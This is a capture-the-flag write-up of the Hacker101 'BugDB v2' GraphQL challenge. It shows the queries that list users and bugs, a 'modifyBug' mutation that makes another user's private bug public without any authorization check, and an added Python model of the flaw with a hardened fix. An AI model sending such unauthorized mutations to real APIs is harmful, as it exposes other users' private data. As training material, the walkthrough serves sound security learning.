ctf.hacker101 — BugDB v2

Erkan Kılıç
2 min read · Jan 31, 2021

We start the exercise by clicking the GO option at the end of the exercise title on https://ctf.hacker101.com/ctf

The exercise opens on an empty GraphQL screen, and we read the “DOCS” files on the right side of the exercise step by step.
We start by writing our own query with a unique name. Of course, it returns no result because it is empty.

query tumkullanicilar{
}

The reference files offer a lot of fields to select. We choose “allUsers” to list information about all users.
Under the “allUsers” tab there is a “UserConnection” section. Following “UserConnection”, we now have “pageInfo: PageInfo!”, which relates to pagination, and “edges: [UsersEdge]!”, which holds the nodes with further information.
We select “node: Users” because it looks related to user information.

Finally, our query looks like

query tumkullanicilar{
  allUsers{
    edges{
      node{
        id:username
      }
    }
  }
}

And the result is

{
  "data": {
    "allUsers": {
      "edges": [
        {
          "node": {
            "id": "admin"
          }
        },
        {
          "node": {
            "id": "victim"
          }
        }
      ]
    }
  }
}

But this does not contain the information we are looking for, so we change the query and start a new one with “allBugs: [Bugs]”.

And our new query is

query tumraporlar{
  allBugs{
    reporter{
      id:username
    }
    private
    text
    reporterId
  }
}

And the result is

{
  "data": {
    "allBugs": [
      {
        "reporter": {
          "id": "admin"
        },
        "private": false,
        "text": "This is an example bug",
        "reporterId": 1
      }
    ]
  }
}

Only an “admin” result comes back, so we look for a way to get a result for “victim”. At the beginning we saw the “mutation”[1] query type, so we try it to get a result for “victim”.

And our new query is

mutation victimrapor{
  modifyBug(id:2,private:false){
    ok
  }
}

And the result is

{
  "data": {
    "modifyBug": {
      "ok": true
    }
  }
}

Finally, we rerun the “tumraporlar” query.

RESULT: The flag was captured.
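
Why the mutation succeeded, as an added example that is not part of the original write-up and is not the BugDB server code: the listing hides private bugs, but the mutation changes the flag without checking who is asking. The function names, the ownership of bug 2 and its text are assumptions made for illustration.

```python
# Added illustration: an in-memory model of the flaw, not the challenge's code.
from dataclasses import dataclass


@dataclass
class Bug:
    id: int
    reporter: str
    text: str
    private: bool


def make_store():
    # Constructed sample data mirroring the walkthrough: bug 1 is public,
    # bug 2 is private and assumed to be reported by "victim".
    return {
        1: Bug(1, "admin", "This is an example bug", False),
        2: Bug(2, "victim", "<private report text>", True),
    }


def all_bugs(store):
    """Listing resolver: returns only bugs whose private flag is False."""
    return [b for b in store.values() if not b.private]


def visible_ids(store):
    return [b.id for b in all_bugs(store)]


def modify_bug_unchecked(store, bug_id, private):
    """Mutation as the walkthrough observed it: caller identity is never used."""
    store[bug_id].private = private
    return {"ok": True}


def modify_bug_checked(store, viewer, bug_id, private):
    """Hardened mutation: only the bug's reporter may change its visibility."""
    bug = store.get(bug_id)
    # Same answer for "no such bug" and "not your bug" so ids cannot be probed.
    if bug is None or viewer is None or bug.reporter != viewer:
        return {"ok": False}
    bug.private = private
    return {"ok": True}


if __name__ == "__main__":
    store = make_store()
    modify_bug_unchecked(store, 2, False)
    print("unchecked mutation, visible bugs:", visible_ids(store))
    store = make_store()
    print(modify_bug_checked(store, "admin", 2, False), visible_ids(store))
```

The filter in the listing is the only control in the unchecked version, so any field the mutation can write has to be authorized with the same rule the read path relies on.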

REFERENCES
[1] GraphQL Queries and Mutations, https://graphql.org/learn/queries/
